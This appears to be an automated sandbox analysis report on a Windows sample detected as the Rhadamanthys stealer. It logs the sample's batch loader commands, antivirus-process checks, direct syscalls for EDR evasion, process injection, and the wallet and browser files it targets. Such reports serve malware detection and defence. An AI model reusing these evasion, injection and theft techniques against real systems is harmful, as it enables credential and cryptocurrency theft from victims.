                      Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1F269C70000 protect: page read and write
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtUnmapViewOfSection: Direct from: 0x7FF68C4AC4BDJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtQuerySystemInformation: Direct from: 0x7FF68C4AC4ADJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtClose: Direct from: 0x7FF68C4AC3CD
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtDelayExecution: Direct from: 0x7FF68C4ADFD8Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtProtectVirtualMemory: Direct from: 0x7FF68C46B26CJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtQuerySystemInformation: Direct from: 0x7FF68C454924Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtQuerySystemInformation: Direct from: 0x7FFEFE4E26A1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtProtectVirtualMemory: Direct from: 0x7FF68C4383B5Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtQueryAttributesFile: Direct from: 0x7FF68C4AD642Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtClose: Direct from: 0x7FF68C4AC5C7
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtOpenFile: Direct from: 0x7FF68C4AC37BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtUnmapViewOfSection: Direct from: 0x7FF68C4AC508Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtQueryInformationToken: Direct from: 0x7FF68C4C3508Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtDelayExecution: Direct from: 0x7FF68C441C92Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comNtProtectVirtualMemory: Direct from: 0x7FF68C458FF0Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comMemory written: C:\Users\user\AppData\Local\Temp\407310\Hop.com base: 24366310000 value starts with: 4D5AJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comThread register set: target process: 4120Jump to behavior
                      Writes to foreign memory regions
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1F269C70000
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF7782E14E0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C433B64 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00007FF68C433B64
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C454364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00007FF68C454364
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmdJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 407310Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tall + ..\Compensation + ..\Limited + ..\Pasta + ..\Patricia + ..\Mac + ..\Terminal + ..\Roommate + ..\Pts + ..\Andorra BJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com Hop.com BJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com C:\Users\user\AppData\Local\Temp\407310\Hop.comJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com C:\Users\user\AppData\Local\Temp\407310\Hop.comJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"Jump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C49DB9C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00007FF68C49DB9C
                      Source: Hop.com, 0000000A.00000000.1481376099.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp, Hop.com, 0000000C.00000000.1600743468.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp, Hop.com, 0000000E.00000000.1602862877.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: Hop.comBinary or memory string: Shell_TrayWnd
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C46FBB0 cpuid 12_2_00007FF68C46FBB0
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB59B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,15_3_00007DF426AB59B0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C46BD88 GetSystemTimeAsFileTime,12_2_00007FF68C46BD88
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C472290 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00007FF68C472290
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Wireshark.exe
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lordpe.exe
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regmon.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.1667413757.00000243663E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.1670933123.000001C276180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: svchost.exe, 0000000F.00000003.2117817268.000001C2785ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Qtum-Electrum\config
                      Source: svchost.exe, 0000000F.00000003.2117817268.000001C2785ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\config
                      Source: svchost.exe, 0000000F.00000003.1918863263.000001C2785AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\com.liberty.jaxx
                      Source: svchost.exe, 0000000F.00000002.2231621187.000001C276274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Exodus\??\C:\Users\user\AppData\Roaming\Tox
                      Source: wmplayer.exe, 00000023.00000003.2136167380.0000021AB3215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Host: HEADclosews:exodus.jsExodusatomic.jsAtomicguarda.jsGuardainfinity.jsInfinitycoinwallet.jsCoinWalletpassphrase.htmlindex.html#/entry/loginWeb Multi-currency Wallet | GuardaInfinityWalletCoin WalletwebSocketDebuggerUrltitle127.0.0.1http://127.0.0.1:%u/json/list?t=%u...*.*passphrase.jsonsecoatomic/Local Storage/leveldb/Coinomi/wallets/%s\Local Storage%s\IndexedDBacc.\Systemroot\system32\kernel32.dllcoinwallet/Local Storage/leveldb/Coin Wallet\Local Storage\leveldbCoin Wallet\Local Storage\leveldb\%LOCALAppData%\Exodus%AppData%\Exodus%LOCALAppData%\atomic\Local Storage\leveldb%AppData%\atomic\Local Storage\leveldb%LOCALAppData%\Coinomi\Coinomi\wallets%AppData%\Coinomi\Coinomi\wallets%LOCALAppData%\Guarda%AppData%\Guarda%LOCALAppData%\InfinityWallet%AppData%\InfinityWalletout of memoryI/O errorsocket closed by peerconnection failuressl not supportedhttpswshttp
                      Source: svchost.exe, 0000000F.00000002.2232565880.000001C2785FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Filenamexodus
                      Source: wmplayer.exe, 00000023.00000003.2136167380.0000021AB3215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Host: HEADclosews:exodus.jsExodusatomic.jsAtomicguarda.jsGuardainfinity.jsInfinitycoinwallet.jsCoinWalletpassphrase.htmlindex.html#/entry/loginWeb Multi-currency Wallet | GuardaInfinityWalletCoin WalletwebSocketDebuggerUrltitle127.0.0.1http://127.0.0.1:%u/json/list?t=%u...*.*passphrase.jsonsecoatomic/Local Storage/leveldb/Coinomi/wallets/%s\Local Storage%s\IndexedDBacc.\Systemroot\system32\kernel32.dllcoinwallet/Local Storage/leveldb/Coin Wallet\Local Storage\leveldbCoin Wallet\Local Storage\leveldb\%LOCALAppData%\Exodus%AppData%\Exodus%LOCALAppData%\atomic\Local Storage\leveldb%AppData%\atomic\Local Storage\leveldb%LOCALAppData%\Coinomi\Coinomi\wallets%AppData%\Coinomi\Coinomi\wallets%LOCALAppData%\Guarda%AppData%\Guarda%LOCALAppData%\InfinityWallet%AppData%\InfinityWalletout of memoryI/O errorsocket closed by peerconnection failuressl not supportedhttpswshttp
                      Source: chrome.exe, 00000013.00000002.1876141419.0000422C00284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: GCMKeyStore
                      Source: svchost.exe, 0000000F.00000002.2231464377.000001C276213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\IconsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MaskableJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MonochromeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\safebrowsingJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\d5610d20-4a84-40b4-96b3-9660f248e6a5Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfakJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\settings\main\ms-language-packsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\IconsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MaskableJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\startupCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cache2\entriesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\settings\mainJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons MaskableJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\safebrowsing\google4Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\IconsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\thumbnailsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cache2Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\IconsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibagJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons MonochromeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\IconsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cache2\doomedJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MonochromeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\IconsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\settings\main\ms-language-packs\browserJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons MonochromeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MonochromeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\settings\main\ms-language-packs\browser\newtabJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-releaseJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons MaskableJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\settingsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons MonochromeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
